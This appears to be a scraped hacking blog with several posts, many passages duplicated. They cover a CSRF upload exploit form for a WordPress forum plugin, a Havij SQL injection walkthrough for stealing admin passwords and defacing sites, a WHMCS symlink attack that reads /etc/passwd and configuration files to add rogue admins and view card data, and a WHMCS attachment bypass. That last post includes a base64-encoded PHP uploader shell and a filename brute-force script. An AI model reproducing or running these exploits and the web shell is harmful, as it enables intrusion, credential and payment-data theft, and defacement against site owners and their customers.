- Title : Wordpress Simple-Forum CSRF Vulnerability - Author : FathurFreakz - Google Dork : inurl:/plugins/simple-forum/ - Exploit : wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php - CSRF Exploit : <form enctype="multipart/form-data" action="http://site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="file" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> - Shell : http://www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
WP Exploit
Posted by
Darkoz0Headmx
Posted on
21:05
HOW TO HACK A WEBSITE BY SQL INJECTION USING HAVIJ | TUTORIAL
Posted by
Darkoz0Headmx
Posted on
22:57
You can download Havij here
After downloading and installing Havij SQL tool,. you have to find an SQL vulnerable site. This can be done by the use of google dorks like
After downloading and installing Havij SQL tool,. you have to find an SQL vulnerable site. This can be done by the use of google dorks like
- inurl:index.php?id=sql under''
Read this tutorial on manual sql under '' searching for the vulnerability '' here ...
but for an easy go, you can just use another automated program known as sql poison . you can download here. The main aim of sql poison scanner is to help you find a vulnerable web page by performing an automated blind search onto a search engine like google. Havij will only hack a website through a specific webpage which you know is vulnerable to sql injection.
-----------------------------------------------------------------------------------------------------------------
Now lets say that you have found a vulnerable weblink url which looks like this one:
- http://www.hackyourdad.com/hisoffice.php?id=282
1. Open havij, then copy and paste the vulnerable weblink as shown in figure
2. Now click in the "Analyze" button
4. After u click Analize, wait for it to find it's vulernable, type of injection, if db server is mysql and it will find database name. Then after get it's database is name like xxxx_xxxx
5. Then go to the next operation of finding tables by clicking "tables" . A sub menu will appear where you will click "Get tables" as shown in the figure below. Your may need to wait for a while before it shows you the tables
2. Now click in the "Analyze" button
4. After u click Analize, wait for it to find it's vulernable, type of injection, if db server is mysql and it will find database name. Then after get it's database is name like xxxx_xxxx
5. Then go to the next operation of finding tables by clicking "tables" . A sub menu will appear where you will click "Get tables" as shown in the figure below. Your may need to wait for a while before it shows you the tables
6. After you get the tables ,there will be a check box for "users" Put mark on it and click on the " get columns " tab as shown in figure
7. Under ''Get columns'' list,.. just check on username and password and click on "Get data"
8. Bingo!!! Now you have the Username and password that may be for the admin...The pass that you will get will be in form of an md5 hash which you will have to decrypt it by using the MD5decryptor tool as shown below
After you have got the Username & the password ready,.. You now need to find the Admin page which will give you access to the control panel (cpanel) of the website.
To find the Admin page, Go to ''Find Admin'' , then enter the site url on ''Path to search'' and click on ''Start'' as shown in the image below
8. Bingo!!! Now you have the Username and password that may be for the admin...The pass that you will get will be in form of an md5 hash which you will have to decrypt it by using the MD5decryptor tool as shown below
After you have got the Username & the password ready,.. You now need to find the Admin page which will give you access to the control panel (cpanel) of the website.
To find the Admin page, Go to ''Find Admin'' , then enter the site url on ''Path to search'' and click on ''Start'' as shown in the image below
Now get the admin page url and open it in your internet browser,.. it will take you to a page which will request for the username and password,.. Enter these details & its Game Over!!!
You will find yourself in the control panel (cpanel) where you will have complete control of the website, you can do whatever the hell you want, you can even deface the website if you are realy in a bad mood :P
WHMCS Hacking Tutorial 2013
Posted by
Darkoz0Headmx
Posted on
16:19
Hi guys. Today i will be showing how to hack a WHMCS via symlinking so lets get started.
Big thanks for HeXagone for helping me. :)
Things you will need:
1) Shelled website
2) Tool i will post at the end of the tutorial
3) Putty
4) Symlink script
5) MySQL manager
What is WHMCS?
DEMO: http://demo.whmcs.com/
ADMIN AREA DEMO: http://demo.whmcs.com/admin/login.php
That is easy
Check your kernel. Usually it will be like:
If your kernel has something like "ns1.hosting.com" in your kernel that means WHMCS is installed on that site.
So go to the hosting.com and you will probably find it.
Or you can google dork it:
Chapter II - Exploiting
First off we need to find our hostings path.
So do
or just view the /etc/passwd file to find all the users on the hosting.
Once you did that save it to the .txt file somewhere.
In my example i got lucky and found the path easy. (There was WordPress installed so i viewed wp-content/plugins/akismet/legacy.php which gave me full path)
But usually you can find it by the URL.
Now i know my site's path:
And WHMCS path is /hosting/ so my goal file is configuration.php located in
Okay, now make a new folder in your shell.
![[Image: regionng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vS8zdBb7Hd58yLFqJCeZVK7TnIswFLPVmflnb3sd1ZLLEsOVtxDnbRzuF9bSaf-pDKwuZUDWAk9v8rjYOzcYdrAhZprsGHFMT80MWrhd74kmrdMW9-=s0-d)
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script (Located at the end of this tutorial)
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script (Located at the end of this tutorial)
![[Image: regionng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uaPtKn51V79dQT-P9CGDx8YedAON5eBbcf7xEcKYBrgzekxJBjrmNeEu8pBuEar_9CTwB9m1MB9FJ9gChr97Gw7kBFGoodM65SwiUeZw8mWK6R4V0H=s0-d)
In that box enter the path and the file you want:
![[Image: regionyh.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sk0pTJymclQRjT8HnqukNj2dX94QMHUIFOZbJJfJWIt_I9D-G11s3N6Gdip2uGMTwo3YmqlymN-rxnPSUDWDeawHtWKC4lb2P5DL3DwXKU4Q2n5V2zqLI=s0-d)
Press go and you now get something like this:
![[Image: regionryb.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_szJZ92pt3nNqTQoZQfeyO7LuLGDjH4apsMefelpEXI9BTGsoaemKuInuAejGdYU7KeSSn2UNXuAD1L2t8N4-Ns4c74NZOJ1wLo_6B6B9wTMGJFUhZE=s0-d)
Press on symlink and it will open a new page.
Notice how the site is blank. That means it worked.
Right click -> View source and our targets database will be there.
![[Image: regionl.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tlf7CmiQDqrEmgn9zcPQSsK-FNfFkgfYiJG1ah8XJ-KgGPh-0ieRSZsEmD7FOYwucnuGyPcIhONGRL9VYoq3VFTWbCXJo76LzTrxSXsxNZcAz60lw18g=s0-d)
![[Image: regiona.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vEoZRCHNDucxOsp8NVu9SUhkLhwAo7kFAyHy69m8Ddp0w4qGg44c9_KpioRebasFhpYDHH1pzYB2UhSaNA2hJRNavtZOWaLvh9ET3nKz9m-DVxUFC8ZA=s0-d)
![[Image: regionz.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWseghCZSm-ovd-2Wqw4hXpeJ1VTW_DgbiyDQwBGy19qKE7I9Bk4XVvhWIXluSwuDYipMsSHsYJjit0_pc3pclHfUTn6oAOHkEtctEhcwr-KlMwgSR=s0-d)
Now that you managed to get configuration info from the site you now need to connect to the MySQL base and create a new administrator.
Open our mysql.php script (Provided on the end of the tutorial) and enter credentials (Username and password)
![[Image: regionrh.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTeG7rnhmezjltAOquhiVdezXzbkfBzDIpaMRHsca22dRKU2dThw44Nz0kdkvcdNDDgxBzNO0qTd5pXikYylHI5I-s8zWA5HacJpaI4SB3QX0nKefdyQ=s0-d)
![[Image: regionwz.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5NhBuzghfk6m-SvIOMnYTO2mf9lXm3QgUalpIuijRiBjdzRMJdMBaJbVwKlFLyibiJt2n-_gAbR1LszQW9U0hOf6SWTlsNc14u_S2TwBB6w6gRSF__OY=s0-d)
When you are logged in on the main database click "Tables".
NOTE: You can press "Dump" to save all info in the database!
You got a list now. Good.
Find tbladmins and click "Data"
![[Image: regioncipng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uuyYnzUgOEd3stGxjJAqJ9TjxBRDxvucGgZSiCi6ngX-_SnUOgQRqLk2d9wdSv7CM7ZwPa7UwzbyJddXp5LkRlx0E0Xs4mE5XdhvqGKUoZbJ8YRhe5y0ex=s0-d)
From there you can edit/add admin users.
As you can see i added a new user so i can access it later.
![[Image: regionok.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v2nnZ7oXVwTyRJJl6H3LoK5T0zkkfBfJHfVYgA-1_wuWNkSBKClOS4WvufiJmdJKOLErl7ApmFvNO44jimTSYLL1Nz9VKnl1bHnpEY2kapdR6PtJ_O=s0-d)
Now i login with the new user i created
![[Image: regionrc.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vPgw2rBMTHQ8LFzZznuNUbo0sRCex9s9A6mTDHtdUFNOf1N0sAT2EtrOomc2V6HMmWN-aPwXPQzp22aGlUI5VkyzKMrDJVPvqCD6AooV_sIbGNEaTz=s0-d)
![[Image: regiontu.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sw3g8I96XWEUHNd42DpIKYl71RLxGPXc2xCLDIWJF9euiyuCM1b1tiieFkrOKOzoOyOWETwSbbTGXc5--kTHE0B44LehAHn_u-pimDbQiyxVeKmlkpAMM=s0-d)
Now i have tool for this cases
WARNING!:
I didnt check for backdoors. So check it for yourself since i'm too lazy.
![[Image: regionnw.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s8GOvDFIxB1LqaWReBAYE96eMFisBDoY-msI1Xy5WaXl6BAdU2ROaNdtCaEJHIHBvjrynKOESROYT8OAEEOY7LaQqKvJEJZOjcUefo402teXHV=s0-d)
There you can manage cPanels, dump them, view CC info and rest of the BH shit. :)
OPTIONAL:
In the PHP tool click on "FTP and SMTP password" (Or Host Roots).
Try the password for the root in Putty.
(It worked for me but they changed the passwords ;( )
Tools used:
MySQL manager
WHMCS tool
Symlink tool
Link:
Big thanks for HeXagone for helping me. :)
Things you will need:
1) Shelled website
2) Tool i will post at the end of the tutorial
3) Putty
4) Symlink script
5) MySQL manager
What is WHMCS?
Code:
“WHMCS is an all-in-one client management, billing & support solution for online businesses. Handling everything from signup to termination, WHMCS is a powerful business automation tool that puts you firmly in control”DEMO: http://demo.whmcs.com/
ADMIN AREA DEMO: http://demo.whmcs.com/admin/login.php
Chapter I - How do i find if my server has WHMCS?
That is easy
Check your kernel. Usually it will be like:
Code:
Linux ns1.hosting.com x.x.xx-xxx.xx.x.xxx #1 SMP xxx xxx x xx:xx:xx EST 2012 x86_64If your kernel has something like "ns1.hosting.com" in your kernel that means WHMCS is installed on that site.
So go to the hosting.com and you will probably find it.
Or you can google dork it:
Code:
site:hosting.com inurl:/admin/login.php "WHMCS"Chapter II - Exploiting
First off we need to find our hostings path.
So do
Code:
cat /etc/passwdOnce you did that save it to the .txt file somewhere.
In my example i got lucky and found the path easy. (There was WordPress installed so i viewed wp-content/plugins/akismet/legacy.php which gave me full path)
But usually you can find it by the URL.
Now i know my site's path:
Code:
/home/user/public_html/And WHMCS path is /hosting/ so my goal file is configuration.php located in
Code:
/home/user/public_html/hosting/configuration.phpOkay, now make a new folder in your shell.
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script (Located at the end of this tutorial)
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script (Located at the end of this tutorial)
In that box enter the path and the file you want:
Code:
/home/user/public_html/hosting/configuration.phpPress go and you now get something like this:
Press on symlink and it will open a new page.
Notice how the site is blank. That means it worked.
Right click -> View source and our targets database will be there.
Chapter III - Getting access to the WHMCS
Now that you managed to get configuration info from the site you now need to connect to the MySQL base and create a new administrator.
Open our mysql.php script (Provided on the end of the tutorial) and enter credentials (Username and password)
When you are logged in on the main database click "Tables".
NOTE: You can press "Dump" to save all info in the database!
You got a list now. Good.
Find tbladmins and click "Data"
From there you can edit/add admin users.
As you can see i added a new user so i can access it later.
Now i login with the new user i created
Now i have tool for this cases
WARNING!:
I didnt check for backdoors. So check it for yourself since i'm too lazy.
There you can manage cPanels, dump them, view CC info and rest of the BH shit. :)
OPTIONAL:
In the PHP tool click on "FTP and SMTP password" (Or Host Roots).
Try the password for the root in Putty.
(It worked for me but they changed the passwords ;( )
Tools used:
MySQL manager
WHMCS tool
Symlink tool
Link:
Code: http://adf.ly/OvmAz
WHMCS Shell Uploading Tutorial
Posted by
Darkoz0Headmx
Posted on
16:04
Credits: sec4ever, MadLeets and all Pakistani Haxors
This Tutorial Is About Uploading Shell On WHMCS Via Attachments
At First , Let's Talk About Mime Types
These Are Extensions
Code:
gif,png,rar,zip,php,asp,aspxApache Uses Extension To Run File As It Extension
For Example If You Upload File As This : b0x.gif
Apache Will run it As Picture/Image
And If You Do it As This : b0x.php
The File will Be Run as PHP File
Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar
So Let's Start in WHMCS go to submit new ticket
Code:
http://site.tld/whmcs/submitticket.phpYou'll See This
So Here The Attachments We've Prospect'z
I : The Extension PHP Is allowed To Be Uploaded
But When We Try 2 Upload PHP File We'll Have This result
To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This
Code:
b0x.PHPThe Changing In Extension Will Be Via Tamepr Data
Then Submit it
Our Ticket Is ready Now .. So We Uploaded PHP
This Was Our 1st Prospect
II : PHP Extension Is not Allowed To Be uploaded on WHMCS
So We'll Use Non-Defined Extension in Apache
Like " rar " So We'll Use Tamper Data Too
We'll Upload As This "b0x.PHP.rar"
Don't Forget Capital Letters
Then We'll Have This
File Uploaded Successfully
But In WHMCS ,, When You Use Attachment or upload One
The File Will Automatically Renamed To Be Like This
Code:
number_filename.extensionFor Example Our File b0x.PHP Will Be Like This
Code:
RandomNumber_b0x.PHPWe'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers
Before That .. Let's Make Small Summery
This Code Must be As Attach File
PHP Code:
<?php
$shellcode = "PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZv cm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFt ZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1l PSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwi IHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkg ew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWydu YW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2Ug eyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="; $b0x = fopen("sec4ever.php","w"); fwrite($b0x,base64_decode($shellcode)); ?>This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined
After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php
PHP Code:
<?
error_reporting(0); $url = "http://domain.tld/whmcs/"; $attachfolder = "attachments"; $attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){ $urls = "$url/$attachfolder/$b0x"; $urls.="_$attach"; $ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls ); $result = @curl_exec($ch);
@curl_close($ch);
} ?> Edit The Variables To Get The Correct Result - 3xPecteDThen When The Script Ends Browsing URL'z Via Auto-Generate By For Function
The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !
But The Script Will Generate Shell/Uploader in Sec4ever.php









